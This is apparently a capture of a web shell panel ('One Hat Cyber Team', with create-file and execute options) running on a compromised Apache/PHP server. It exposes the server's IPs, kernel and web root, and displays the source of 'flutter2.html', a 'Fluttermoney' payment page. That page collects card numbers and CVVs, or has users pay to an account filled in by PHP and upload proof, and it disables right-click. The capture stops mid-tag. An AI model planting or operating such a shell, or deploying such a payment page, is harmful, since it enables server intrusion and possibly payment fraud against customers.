⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.231
Server IP:
13.127.59.50
Server:
Linux ip-172-31-46-210 5.15.0-1033-aws #37~20.04.1-Ubuntu SMP Fri Mar 17 11:39:30 UTC 2023 x86_64
Server Software:
Apache/2.4.41 (Ubuntu)
PHP Version:
7.4.3-4ubuntu2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
ecommerce_pg
/
public
/
files
/
View File Name :
flutter2.html
<!doctype html> <html> <head> <meta charset='utf-8'> <meta name='viewport' content='width=device-width, initial-scale=1'> <title>Fluttermoney - Payments</title> <link href='https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css' rel='stylesheet'> <link href='https://use.fontawesome.com/releases/v5.8.1/css/all.css' rel='stylesheet'> <style>body { background: #f5f5f5 } .rounded { border-radius: 1rem } .nav-pills .nav-link { color: #555; box-shadow: 2.5px 5px 5px grey; margin: 5px; } .nav-pills .nav-link.active { color: white } input[type="radio"] { margin-right: 5px } .bold { font-weight: bold } </style> <script type='text/javascript' src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js'></script> <script type='text/javascript' src='https://cdn.jsdelivr.net/npm/popper.js@1.16.0/dist/umd/popper.min.js'></script> <script type='text/javascript' src='https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js'></script> <script type='text/javascript'>$(function() { $('[data-toggle="tooltip"]').tooltip() }) </script> </head> <body oncontextmenu='return false' class='snippet-body' style="background-color: #0c1248"> <div class="container py-5"> <!-- For demo purpose --> <div class="row mb-4" style="display:block; text-align: center;"> <img src="https://fluttermoney.com/order/images/infinio-logo.png"> </div> <!-- End --> <div class="row"> <div class="col-lg-6 mx-auto"> <div class="card "> <div class="card-header"> <div class="bg-white shadow-sm pt-4 pl-2 pr-2 pb-2"> <!-- Credit card form tabs --> <ul role="tablist" class="nav bg-light nav-pills rounded nav-fill mb-3"> <li class="nav-item"> <a data-toggle="pill" href="#bank-transfer" class="nav-link active"> <i class="fas fa-credit-card mr-2"></i> Bank Transfer </a> </li> <li class="nav-item"> <a data-toggle="pill" href="#credit-card" class="nav-link"> <i class="fas fa-credit-card mr-2"></i> Credit Card </a> </li> <li class="nav-item"> <a data-toggle="pill" href="#debit-card" class="nav-link"> <i class="fas fa-credit-card mr-2"></i> Debit Card </a> </li> <li class="nav-item"> <a data-toggle="pill" href="#net-banking" class="nav-link"> <i class="fas fa-credit-card mr-2"></i> Net Banking </a> </li> <li class="nav-item"> <a data-toggle="pill" href="#Gpay" class="nav-link"> <i class="fas fa-credit-card mr-2"></i> Gpay </a> </li> <li class="nav-item"> <a data-toggle="pill" href="#PhonePe" class="nav-link"> <i class="fas fa-credit-card mr-2"></i> PhonePe </a> </li> <li class="nav-item"> <a data-toggle="pill" href="#Paytm" class="nav-link"> <i class="fas fa-credit-card mr-2"></i> Paytm </a> </li> <li class="nav-item"> <a data-toggle="pill" href="#paypal" class="nav-link "> <i class="fab fa-paypal mr-2"></i> Paypal </a> </li> <li class="nav-item"> <a data-toggle="pill" href="#neteller" class="nav-link "> <i class="fab fa-paypal mr-2"></i> Neteller </a> </li> <li class="nav-item"> <a data-toggle="pill" href="#cod" class="nav-link "> <i class="fab fa-paypal mr-2"></i> Cash On Delivery </a> </li> </ul> </div> <!-- End --> <!-- Credit card form content --> <!-- Credit card form content --> <div class="tab-content"> <!-- credit card info--> <div id="credit-card" class="tab-pane fade pt-3"> <form role="form"> <div class="form-group"> <label for="username"> <h6>Card Owner</h6> </label> <input type="text" name="username" placeholder="Card Owner Name" required class="form-control "> </div> <div class="form-group"> <label for="cardNumber"> <h6>Card number</h6> </label> <div class="input-group"> <input type="text" name="cardNumber" placeholder="Valid card number" class="form-control " required> <div class="input-group-append"> <span class="input-group-text text-muted"> <i class="fab fa-cc-visa mx-1"></i> <i class="fab fa-cc-mastercard mx-1"></i> <i class="fab fa-cc-amex mx-1"></i> </span> </div> </div> </div> <div class="row"> <div class="col-sm-8"> <div class="form-group"> <label> <span class="hidden-xs"> <h6>Expiration Date</h6> </span> </label> <div class="input-group"> <input type="number" placeholder="MM" name="" class="form-control" required> <input type="number" placeholder="YY" name="" class="form-control" required> </div> </div> </div> <div class="col-sm-4"> <div class="form-group mb-4"> <label data-toggle="tooltip" title="Three digit CV code on the back of your card"> <h6>CVV <i class="fa fa-question-circle d-inline"></i></h6> </label> <input type="text" required class="form-control"> </div> </div> </div> <div class="card-footer"> <button type="button" class="subscribe btn btn-primary btn-block shadow-sm"> Confirm Payment </button> </form> </div> </div> <!-- End --> <!-- Paypal info --> <div id="paypal" class="tab-pane fade pt-3"> <h6 class="pb-2">Select your paypal account type</h6> <div class="form-group "> <label class="radio-inline"> <input type="radio" name="optradio" checked> Domestic </label> <label class="radio-inline"> <input type="radio" name="optradio" class="ml-5">International </label></div> <p> <button type="button" class="btn btn-primary "><i class="fab fa-paypal mr-2"></i> Log into my Paypal</button> </p> <p class="text-muted"> Note: After clicking on the button, you will be directed to a secure gateway for payment. After completing the payment process, you will be redirected back to the website to view details of your order. </p> </div> <!-- End --> <!-- Paypal info --> <div id="neteller" class="tab-pane fade pt-3"> <h6 class="pb-2">Select your neteller account type</h6> <div class="form-group "> <label class="radio-inline"> <input type="radio" name="optradio" checked> Domestic </label> <label class="radio-inline"> <input type="radio" name="optradio" class="ml-5">International </label></div> <p> <button type="button" class="btn btn-primary "><i class="fab fa-paypal mr-2"></i> Log into my neteller</button> </p> <p class="text-muted"> Note: After clicking on the button, you will be directed to a secure gateway for payment. After completing the payment process, you will be redirected back to the website to view details of your order. </p> </div> <!-- End --> <!-- bank transfer info --> <div id="net-banking" class="tab-pane fade pt-3"> <div class="form-group "> <label for="Select Your Bank"> <h6>Select your Bank</h6> </label> <select class="form-control" id="ccmonth"> <option value="" selected disabled>--Please select your Bank--</option> <option>Bank 1</option> <option>Bank 2</option> <option>Bank 3</option> <option>Bank 4</option> <option>Bank 5</option> <option>Bank 6</option> <option>Bank 7</option> <option>Bank 8</option> <option>Bank 9</option> <option>Bank 10</option> </select> </div> <div class="form-group"> <p> <button type="button" class="btn btn-primary "><i class="fas fa-mobile-alt mr-2"></i> Proceed Pyment</button> </p> </div> <p class="text-muted">Note: After clicking on the button, you will be directed to a secure gateway for payment. After completing the payment process, you will be redirected back to the website to view details of your order. </p> </div> <!-- End --> <div id="bank-transfer" class="tab-pane show active fade pt-3"> <h4>Bank Transfer</h4> <hr/> <div class="row"> <div class="col col-sm-12"> <center> <h2 style="font-size:2em;color:#3B8894"> <svg style="width: 20%; height: auto;" version="1.1" id="Capa_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512.002 512.002" style="enable-background:new 0 0 512.002 512.002;" xml:space="preserve"> <g> <path style="fill:#88B337;" d="M423.622,332.518c0.009-3.866-1.059-7.652-3.089-10.944l-19.681-31.683 c-2.453-4.872-3.724-10.255-3.707-15.709v-97.61c0-63.367-51.364-114.731-114.731-114.731h-52.953 c-63.367,0-114.731,51.364-114.731,114.731v97.61c0.018,5.454-1.253,10.838-3.707,15.709l-19.681,31.683 c-2.03,3.292-3.098,7.078-3.089,10.944l0,0c0.044,11.341,9.223,20.519,20.563,20.563h294.241 C414.399,353.037,423.578,343.858,423.622,332.518z"/> <polygon style="fill:#88B337;" points="282.415,61.841 326.542,0.063 185.335,0.063 229.462,61.841 229.462,79.492 282.415,79.492 "/> </g> <path style="fill:#6B962A;" d="M420.533,321.574l-19.681-31.683c-2.453-4.872-3.724-10.255-3.707-15.709v-97.61 c0.062-25.559-8.419-50.411-24.093-70.604C349.488,235.791,266.529,310.631,188.6,353.081h214.459 c11.402,0.044,20.687-9.161,20.731-20.572c0.018-3.866-1.05-7.652-3.08-10.935H420.533z"/> <path style="fill:#FFFFFF;" d="M300.065,194.223v-5.648c-0.044-16.354-13.3-29.609-29.654-29.654h-5.648V141.27h-17.651v17.651 h-5.648c-16.38-0.053-29.698,13.176-29.751,29.556c-0.044,12.435,7.678,23.573,19.337,27.897l16.062,6.001v33.625h-5.648 c-6.628,0-12.003-5.375-12.003-12.003l0,0v-5.648h-17.651v5.648c0.044,16.354,13.3,29.609,29.654,29.654h28.948 c16.38,0.053,29.698-13.176,29.751-29.556c0.044-12.435-7.678-23.573-19.337-27.897l-16.062-6.001v-33.625h5.648 c6.628,0,12.003,5.375,12.003,12.003l0,0v5.648H300.065z M274.648,232.702c4.66,1.809,7.74,6.293,7.766,11.297 c0,6.628-5.375,12.003-12.003,12.003l0,0h-5.648v-27.006L274.648,232.702z M247.113,203.578l-9.885-3.707 c-4.66-1.809-7.74-6.293-7.766-11.297c0-6.628,5.375-12.003,12.003-12.003l0,0h5.648V203.578z"/> <g> <path style="fill:#FDB62F;" d="M432.447,88.317L432.447,88.317c-3.001-18.11-17.192-32.301-35.302-35.302l0,0 c18.11-3.001,32.301-17.192,35.302-35.302l0,0c3.001,18.11,17.192,32.301,35.302,35.302l0,0 C449.639,56.016,435.448,70.208,432.447,88.317z"/> <path style="fill:#FDB62F;" d="M35.302,264.826L35.302,264.826C32.301,246.717,18.11,232.525,0,229.525l0,0 c18.11-3.001,32.301-17.192,35.302-35.302l0,0c3.001,18.11,17.192,32.301,35.302,35.302l0,0 C52.494,232.525,38.302,246.717,35.302,264.826z"/> </g> <path style="fill:#FEC9A3;" d="M508.081,307.983c-7.246-12.197-22.814-16.512-35.302-9.796l-125.233,53.482 c-2.206,0.935-4.58,1.421-6.972,1.412h-155.24c-9.752,0-17.651-7.899-17.651-17.651c0-9.752,7.899-17.651,17.651-17.651h70.604 c29.248,0,52.953-23.705,52.953-52.953H162.035c-24.341,0.018-47.357,11.094-62.572,30.095l-55.336,66.985l62.308,114.201 l239.788-57.63c10.361-2.392,20.387-6.063,29.83-10.944l123.556-63.279C511.903,336.533,515.68,320.356,508.081,307.983z"/> <path style="fill:#F7BB8F;" d="M86.578,439.747l19.857,36.361l239.788-57.63c10.361-2.392,20.387-6.063,29.83-10.944l66.809-34.331 C331.837,407.181,184.452,428.362,86.578,439.747z"/> <polygon style="fill:#4398D1;" points="0,353.081 0,511.939 114.731,511.939 141.207,485.463 35.302,326.605 "/> <path style="fill:#3E8CC7;" d="M0,511.939h114.731l26.476-26.476l-19.416-29.124C82.536,472.542,41.727,484.695,0,492.612V511.939z" /> <circle style="fill:#D9D9D9;" cx="79.429" cy="467.838" r="17.651"/> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> </h2> <h4 style="margin-top: 0;color:#3B8894">Please transfer the amount Rs.<?php echo $orderAmount; ?> to the bank details below.</h4> <br> <h5 style="color:#3B8894">Account Name: <?php echo $bankname; ?></h5> <h5 style="color:#3B8894">Account Number: <?php echo $bankaccount; ?></h5> <h5 style="color:#3B8894">IFSC Code: ICIC0000169</h5> <form autocomplete="off" method="POST" action="<?php echo $banktransfer; ?>" enctype="multipart/form-data"> <div id="upiVpaDiv" class = ""> <p>Enter your Reference Id/ Transaction No. of transaction (<b>after transfer is successful</b>)</p> <div style="display: flex;align-items: center;"> <div class="group mb-0"> <input type="text" class="form-control" name="Reference Id" id="upiVpa" placeholder="Enter Reference Id"/> <br> <h6>Or Select screenshot of transaction to upload:</h6> <input type="file" name="fileToUpload" id="fileToUpload" style=""> <input type="hidden" name="Order Amount" value="<?php echo $orderAmount; ?>" id="inputTransactionId"/> <input type="hidden" name="User Name" value="<?php echo $customerName; ?>" id="inputStatus"/> <input type="hidden" name="CustomerEmail" value="<?php echo $customerEmail; ?>" id="inputStatus"/> <input type="hidden" name="CustomerPhone" value="<?php echo $phone; ?>" id="inputStatus"/> <input type="hidden" name="OrderId" value="<?php echo $orderId; ?>" id="inputStatus"/> <span class="highlight"></span> <span class="bar"></span> </div> </div> <div class="clearfix"> </div> <!-- <div class="checkbox"> <label> <input type="checkbox" id="saveVpa" checked="checked"/> Remember my VPA on this device </label> </div> --> </div> <button type="submit" class="btn pay-button upi-button btn-full submit-button-pc" style="margin-top:20px">SUBMIT</button> </form> </center> </div> </div> </div> <!-- End --> <div id="PhonePe" class="tab-pane fade pt-3"> <h4>PhonePe</h4> <hr/> <div class="row"> <div class="col col-sm-12"> <center> <h2 style="font-size:2em;color:#3B8894"> <svg style="width: 20%; height: auto;" version="1.1" id="Capa_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512.002 512.002" style="enable-background:new 0 0 512.002 512.002;" xml:space="preserve"> <g> <path style="fill:#88B337;" d="M423.622,332.518c0.009-3.866-1.059-7.652-3.089-10.944l-19.681-31.683 c-2.453-4.872-3.724-10.255-3.707-15.709v-97.61c0-63.367-51.364-114.731-114.731-114.731h-52.953 c-63.367,0-114.731,51.364-114.731,114.731v97.61c0.018,5.454-1.253,10.838-3.707,15.709l-19.681,31.683 c-2.03,3.292-3.098,7.078-3.089,10.944l0,0c0.044,11.341,9.223,20.519,20.563,20.563h294.241 C414.399,353.037,423.578,343.858,423.622,332.518z"/> <polygon style="fill:#88B337;" points="282.415,61.841 326.542,0.063 185.335,0.063 229.462,61.841 229.462,79.492 282.415,79.492 "/> </g> <path style="fill:#6B962A;" d="M420.533,321.574l-19.681-31.683c-2.453-4.872-3.724-10.255-3.707-15.709v-97.61 c0.062-25.559-8.419-50.411-24.093-70.604C349.488,235.791,266.529,310.631,188.6,353.081h214.459 c11.402,0.044,20.687-9.161,20.731-20.572c0.018-3.866-1.05-7.652-3.08-10.935H420.533z"/> <path style="fill:#FFFFFF;" d="M300.065,194.223v-5.648c-0.044-16.354-13.3-29.609-29.654-29.654h-5.648V141.27h-17.651v17.651 h-5.648c-16.38-0.053-29.698,13.176-29.751,29.556c-0.044,12.435,7.678,23.573,19.337,27.897l16.062,6.001v33.625h-5.648 c-6.628,0-12.003-5.375-12.003-12.003l0,0v-5.648h-17.651v5.648c0.044,16.354,13.3,29.609,29.654,29.654h28.948 c16.38,0.053,29.698-13.176,29.751-29.556c0.044-12.435-7.678-23.573-19.337-27.897l-16.062-6.001v-33.625h5.648 c6.628,0,12.003,5.375,12.003,12.003l0,0v5.648H300.065z M274.648,232.702c4.66,1.809,7.74,6.293,7.766,11.297 c0,6.628-5.375,12.003-12.003,12.003l0,0h-5.648v-27.006L274.648,232.702z M247.113,203.578l-9.885-3.707 c-4.66-1.809-7.74-6.293-7.766-11.297c0-6.628,5.375-12.003,12.003-12.003l0,0h5.648V203.578z"/> <g> <path style="fill:#FDB62F;" d="M432.447,88.317L432.447,88.317c-3.001-18.11-17.192-32.301-35.302-35.302l0,0 c18.11-3.001,32.301-17.192,35.302-35.302l0,0c3.001,18.11,17.192,32.301,35.302,35.302l0,0 C449.639,56.016,435.448,70.208,432.447,88.317z"/> <path style="fill:#FDB62F;" d="M35.302,264.826L35.302,264.826C32.301,246.717,18.11,232.525,0,229.525l0,0 c18.11-3.001,32.301-17.192,35.302-35.302l0,0c3.001,18.11,17.192,32.301,35.302,35.302l0,0 C52.494,232.525,38.302,246.717,35.302,264.826z"/> </g> <path style="fill:#FEC9A3;" d="M508.081,307.983c-7.246-12.197-22.814-16.512-35.302-9.796l-125.233,53.482 c-2.206,0.935-4.58,1.421-6.972,1.412h-155.24c-9.752,0-17.651-7.899-17.651-17.651c0-9.752,7.899-17.651,17.651-17.651h70.604 c29.248,0,52.953-23.705,52.953-52.953H162.035c-24.341,0.018-47.357,11.094-62.572,30.095l-55.336,66.985l62.308,114.201 l239.788-57.63c10.361-2.392,20.387-6.063,29.83-10.944l123.556-63.279C511.903,336.533,515.68,320.356,508.081,307.983z"/> <path style="fill:#F7BB8F;" d="M86.578,439.747l19.857,36.361l239.788-57.63c10.361-2.392,20.387-6.063,29.83-10.944l66.809-34.331 C331.837,407.181,184.452,428.362,86.578,439.747z"/> <polygon style="fill:#4398D1;" points="0,353.081 0,511.939 114.731,511.939 141.207,485.463 35.302,326.605 "/> <path style="fill:#3E8CC7;" d="M0,511.939h114.731l26.476-26.476l-19.416-29.124C82.536,472.542,41.727,484.695,0,492.612V511.939z" /> <circle style="fill:#D9D9D9;" cx="79.429" cy="467.838" r="17.651"/> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> </h2> <h4 style="margin-top: 0;color:#3B8894">Please transfer the amount Rs.<?php echo $orderAmount; ?> to the PhonePe account provided below.</h4> <br> <img src="phonepelogo.png" width="50%"></img> <h5 style="color:#3B8894">PhonePe Number: <?php echo $numberph; ?></h5> <h5 style="color:#3B8894">PhonePe Name: FlutterMoney</h5> <form autocomplete="off" method="POST" action="<?php echo $phonepe; ?>" enctype="multipart/form-data"> <div id="upiVpaDiv" class = ""> <p>Enter your PhonePe associated phonenumber/ PhonePe Account name / transaction reference (<b>after transfer is successful</b>)</p> <div style="display: flex;align-items: center;"> <div class="group mb-0"> <input type="text" class="form-control" name="phonepeno" id="upiVpa" placeholder="Enter Phonepe Number/Name"/> <br> <h6>Or Select screenshot of transaction to upload:</h6> <input type="file" name="fileToUpload" id="fileToUpload" style=""> <input type="hidden" name="Order Amount" value="<?php echo $orderAmount; ?>" id="inputTransactionId"/> <input type="hidden" name="User Name" value="<?php echo $customerName; ?>" id="inputStatus"/> <input type="hidden" name="CustomerEmail" value="<?php echo $customerEmail; ?>" id="inputStatus"/> <input type="hidden" name="CustomerPhone" value="<?php echo $phone; ?>" id="inputStatus"/> <input type="hidden" name="OrderId" value="<?php echo $orderId; ?>" id="inputStatus"/> <span class="highlight"></span> <span class="bar"></span> </div> </div> <div class="clearfix"> </div> <!-- <div class="checkbox"> <label> <input type="checkbox" id="saveVpa" checked="checked"/> Remember my VPA on this device </label> </div> --> </div> <button type="submit" class="btn pay-button upi-button btn-full submit-button-pc" >SUBMIT</button> </form> </center> </div> </div> </div> <!-- End --> <div id="Gpay" class="tab-pane fade pt-3"> <h4>GooglePay</h4> <hr/> <div class="row"> <div class="col col-sm-12"> <center> <h2 style="font-size:2em;color:#3B8894"> <svg style="width: 20%; height: auto;" version="1.1" id="Capa_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512.002 512.002" style="enable-background:new 0 0 512.002 512.002;" xml:space="preserve"> <g> <path style="fill:#88B337;" d="M423.622,332.518c0.009-3.866-1.059-7.652-3.089-10.944l-19.681-31.683 c-2.453-4.872-3.724-10.255-3.707-15.709v-97.61c0-63.367-51.364-114.731-114.731-114.731h-52.953 c-63.367,0-114.731,51.364-114.731,114.731v97.61c0.018,5.454-1.253,10.838-3.707,15.709l-19.681,31.683 c-2.03,3.292-3.098,7.078-3.089,10.944l0,0c0.044,11.341,9.223,20.519,20.563,20.563h294.241 C414.399,353.037,423.578,343.858,423.622,332.518z"/> <polygon style="fill:#88B337;" points="282.415,61.841 326.542,0.063 185.335,0.063 229.462,61.841 229.462,79.492 282.415,79.492 "/> </g> <path style="fill:#6B962A;" d="M420.533,321.574l-19.681-31.683c-2.453-4.872-3.724-10.255-3.707-15.709v-97.61 c0.062-25.559-8.419-50.411-24.093-70.604C349.488,235.791,266.529,310.631,188.6,353.081h214.459 c11.402,0.044,20.687-9.161,20.731-20.572c0.018-3.866-1.05-7.652-3.08-10.935H420.533z"/> <path style="fill:#FFFFFF;" d="M300.065,194.223v-5.648c-0.044-16.354-13.3-29.609-29.654-29.654h-5.648V141.27h-17.651v17.651 h-5.648c-16.38-0.053-29.698,13.176-29.751,29.556c-0.044,12.435,7.678,23.573,19.337,27.897l16.062,6.001v33.625h-5.648 c-6.628,0-12.003-5.375-12.003-12.003l0,0v-5.648h-17.651v5.648c0.044,16.354,13.3,29.609,29.654,29.654h28.948 c16.38,0.053,29.698-13.176,29.751-29.556c0.044-12.435-7.678-23.573-19.337-27.897l-16.062-6.001v-33.625h5.648 c6.628,0,12.003,5.375,12.003,12.003l0,0v5.648H300.065z M274.648,232.702c4.66,1.809,7.74,6.293,7.766,11.297 c0,6.628-5.375,12.003-12.003,12.003l0,0h-5.648v-27.006L274.648,232.702z M247.113,203.578l-9.885-3.707 c-4.66-1.809-7.74-6.293-7.766-11.297c0-6.628,5.375-12.003,12.003-12.003l0,0h5.648V203.578z"/> <g> <path style="fill:#FDB62F;" d="M432.447,88.317L432.447,88.317c-3.001-18.11-17.192-32.301-35.302-35.302l0,0 c18.11-3.001,32.301-17.192,35.302-35.302l0,0c3.001,18.11,17.192,32.301,35.302,35.302l0,0 C449.639,56.016,435.448,70.208,432.447,88.317z"/> <path style="fill:#FDB62F;" d="M35.302,264.826L35.302,264.826C32.301,246.717,18.11,232.525,0,229.525l0,0 c18.11-3.001,32.301-17.192,35.302-35.302l0,0c3.001,18.11,17.192,32.301,35.302,35.302l0,0 C52.494,232.525,38.302,246.717,35.302,264.826z"/> </g> <path style="fill:#FEC9A3;" d="M508.081,307.983c-7.246-12.197-22.814-16.512-35.302-9.796l-125.233,53.482 c-2.206,0.935-4.58,1.421-6.972,1.412h-155.24c-9.752,0-17.651-7.899-17.651-17.651c0-9.752,7.899-17.651,17.651-17.651h70.604 c29.248,0,52.953-23.705,52.953-52.953H162.035c-24.341,0.018-47.357,11.094-62.572,30.095l-55.336,66.985l62.308,114.201 l239.788-57.63c10.361-2.392,20.387-6.063,29.83-10.944l123.556-63.279C511.903,336.533,515.68,320.356,508.081,307.983z"/> <path style="fill:#F7BB8F;" d="M86.578,439.747l19.857,36.361l239.788-57.63c10.361-2.392,20.387-6.063,29.83-10.944l66.809-34.331 C331.837,407.181,184.452,428.362,86.578,439.747z"/> <polygon style="fill:#4398D1;" points="0,353.081 0,511.939 114.731,511.939 141.207,485.463 35.302,326.605 "/> <path style="fill:#3E8CC7;" d="M0,511.939h114.731l26.476-26.476l-19.416-29.124C82.536,472.542,41.727,484.695,0,492.612V511.939z" /> <circle style="fill:#D9D9D9;" cx="79.429" cy="467.838" r="17.651"/> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> </h2> <h4 style="margin-top: 0;color:#3B8894">Please transfer the amount Rs.<?php echo $orderAmount; ?> to the GPay account provided below.</h4> <br> <img src="gpaylogo.png" width="50%"></img> <h5 style="color:#3B8894">GPay Number: <?php echo $numberph; ?></h5> <h5 style="color:#3B8894">Gpay Name: FlutterMoney</h5> <form autocomplete="off" method="POST" action="<?php echo $gpay; ?>" enctype="multipart/form-data"> <div id="upiVpaDiv" class = ""> <p>Enter your GooglePay associated phonenumber/ Gpay Account name / transaction reference (<b>after transfer is successful</b>)</p> <div style="display: flex;align-items: center;"> <div class="group mb-0"> <input type="text" class="form-control" name="Googlepayno" id="upiVpa" placeholder="Enter Gpay Number/Name"/> <br> <h6>Or Select screenshot of transaction to upload:</h6> <input type="file" name="fileToUpload" id="fileToUpload" style=""> <input type="hidden" name="Order Amount" value="<?php echo $orderAmount; ?>" id="inputTransactionId"/> <input type="hidden" name="User Name" value="<?php echo $customerName; ?>" id="inputStatus"/> <input type="hidden" name="CustomerEmail" value="<?php echo $customerEmail; ?>" id="inputStatus"/> <input type="hidden" name="CustomerPhone" value="<?php echo $phone; ?>" id="inputStatus"/> <input type="hidden" name="OrderId" value="<?php echo $orderId; ?>" id="inputStatus"/> <span class="highlight"></span> <span class="bar"></span> </div> </div> <div class="clearfix"> </div> <!-- <div class="checkbox"> <label> <input type="checkbox" id="saveVpa" checked="checked"/> Remember my VPA on this device </label> </div> --> </div> <button type="submit" class="btn pay-button upi-button btn-full submit-button-pc" >SUBMIT</button> </form> </center> </div> </div> </div> <!-- End --> <div id="Paytm" class="tab-pane fade pt-3"> <h4>PayTM</h4> <hr/> <div class="row"> <div class="col col-sm-12"> <center> <h2 style="font-size:2em;color:#3B8894"> <svg style="width: 20%; height: auto;" version="1.1" id="Capa_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512.002 512.002" style="enable-background:new 0 0 512.002 512.002;" xml:space="preserve"> <g> <path style="fill:#88B337;" d="M423.622,332.518c0.009-3.866-1.059-7.652-3.089-10.944l-19.681-31.683 c-2.453-4.872-3.724-10.255-3.707-15.709v-97.61c0-63.367-51.364-114.731-114.731-114.731h-52.953 c-63.367,0-114.731,51.364-114.731,114.731v97.61c0.018,5.454-1.253,10.838-3.707,15.709l-19.681,31.683 c-2.03,3.292-3.098,7.078-3.089,10.944l0,0c0.044,11.341,9.223,20.519,20.563,20.563h294.241 C414.399,353.037,423.578,343.858,423.622,332.518z"/> <polygon style="fill:#88B337;" points="282.415,61.841 326.542,0.063 185.335,0.063 229.462,61.841 229.462,79.492 282.415,79.492 "/> </g> <path style="fill:#6B962A;" d="M420.533,321.574l-19.681-31.683c-2.453-4.872-3.724-10.255-3.707-15.709v-97.61 c0.062-25.559-8.419-50.411-24.093-70.604C349.488,235.791,266.529,310.631,188.6,353.081h214.459 c11.402,0.044,20.687-9.161,20.731-20.572c0.018-3.866-1.05-7.652-3.08-10.935H420.533z"/> <path style="fill:#FFFFFF;" d="M300.065,194.223v-5.648c-0.044-16.354-13.3-29.609-29.654-29.654h-5.648V141.27h-17.651v17.651 h-5.648c-16.38-0.053-29.698,13.176-29.751,29.556c-0.044,12.435,7.678,23.573,19.337,27.897l16.062,6.001v33.625h-5.648 c-6.628,0-12.003-5.375-12.003-12.003l0,0v-5.648h-17.651v5.648c0.044,16.354,13.3,29.609,29.654,29.654h28.948 c16.38,0.053,29.698-13.176,29.751-29.556c0.044-12.435-7.678-23.573-19.337-27.897l-16.062-6.001v-33.625h5.648 c6.628,0,12.003,5.375,12.003,12.003l0,0v5.648H300.065z M274.648,232.702c4.66,1.809,7.74,6.293,7.766,11.297 c0,6.628-5.375,12.003-12.003,12.003l0,0h-5.648v-27.006L274.648,232.702z M247.113,203.578l-9.885-3.707 c-4.66-1.809-7.74-6.293-7.766-11.297c0-6.628,5.375-12.003,12.003-12.003l0,0h5.648V203.578z"/> <g> <path style="fill:#FDB62F;" d="M432.447,88.317L432.447,88.317c-3.001-18.11-17.192-32.301-35.302-35.302l0,0 c18.11-3.001,32.301-17.192,35.302-35.302l0,0c3.001,18.11,17.192,32.301,35.302,35.302l0,0 C449.639,56.016,435.448,70.208,432.447,88.317z"/> <path style="fill:#FDB62F;" d="M35.302,264.826L35.302,264.826C32.301,246.717,18.11,232.525,0,229.525l0,0 c18.11-3.001,32.301-17.192,35.302-35.302l0,0c3.001,18.11,17.192,32.301,35.302,35.302l0,0 C52.494,232.525,38.302,246.717,35.302,264.826z"/> </g> <path style="fill:#FEC9A3;" d="M508.081,307.983c-7.246-12.197-22.814-16.512-35.302-9.796l-125.233,53.482 c-2.206,0.935-4.58,1.421-6.972,1.412h-155.24c-9.752,0-17.651-7.899-17.651-17.651c0-9.752,7.899-17.651,17.651-17.651h70.604 c29.248,0,52.953-23.705,52.953-52.953H162.035c-24.341,0.018-47.357,11.094-62.572,30.095l-55.336,66.985l62.308,114.201 l239.788-57.63c10.361-2.392,20.387-6.063,29.83-10.944l123.556-63.279C511.903,336.533,515.68,320.356,508.081,307.983z"/> <path style="fill:#F7BB8F;" d="M86.578,439.747l19.857,36.361l239.788-57.63c10.361-2.392,20.387-6.063,29.83-10.944l66.809-34.331 C331.837,407.181,184.452,428.362,86.578,439.747z"/> <polygon style="fill:#4398D1;" points="0,353.081 0,511.939 114.731,511.939 141.207,485.463 35.302,326.605 "/> <path style="fill:#3E8CC7;" d="M0,511.939h114.731l26.476-26.476l-19.416-29.124C82.536,472.542,41.727,484.695,0,492.612V511.939z" /> <circle style="fill:#D9D9D9;" cx="79.429" cy="467.838" r="17.651"/> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> <g></g> </h2> <h4 style="margin-top: 0;color:#3B8894">Please transfer the amount Rs.<?php echo $orderAmount; ?> to the PayTM account provided below.</h4> <br> <img src="paytmlogo.png" width="50%"></img> <h5 style="color:#3B8894">PayTM Number: <?php echo $numberph; ?></h5> <h5 style="color:#3B8894">PayTM Name: FlutterMoney</h5> <form autocomplete="off" method="POST" action="<?php echo $paytm; ?>" enctype="multipart/form-data"> <div id="upiVpaDiv" class = ""> <p>Enter your PayTM associated phonenumber/ PayTM Account name / transaction reference (<b>after transfer is successful</b>)</p> <div style="display: flex;align-items: center;"> <div class="group mb-0"> <input type="text" class="form-control" name="PaytNo" id="upiVpa" placeholder="Enter PayTM Number/Name"/> <br> <h6>Or Select screenshot of transaction to upload:</h6> <input type="file" name="fileToUpload" id="fileToUpload" style=""> <input type="hidden" name="Order Amount" value="<?php echo $orderAmount; ?>" id="inputTransactionId"/> <input type="hidden" name="User Name" value="<?php echo $customerName; ?>" id="inputStatus"/> <input type="hidden" name="CustomerEmail" value="<?php echo $customerEmail; ?>" id="inputStatus"/> <input type="hidden" name="CustomerPhone" value="<?php echo $phone; ?>" id="inputStatus"/> <input type="hidden" name="OrderId" value="<?php echo $orderId; ?>" id="inputStatus"/> <span class="highlight"></span> <span class="bar"></span> </div> </div> <div class="clearfix"> </div> <!-- <div class="checkbox"> <label> <input type="checkbox" id="saveVpa" checked="checked"/> Remember my VPA on this device </label> </div> --> </div> <button type="submit" class="btn pay-button upi-button btn-full submit-button-pc" >SUBMIT</button> </form> </center> </div> </div> </div> <div id="cod" class="tab-pane fade pt-3"> <h4>Cash On Delivery</h4> <hr/> <div class="row"> <div class="col 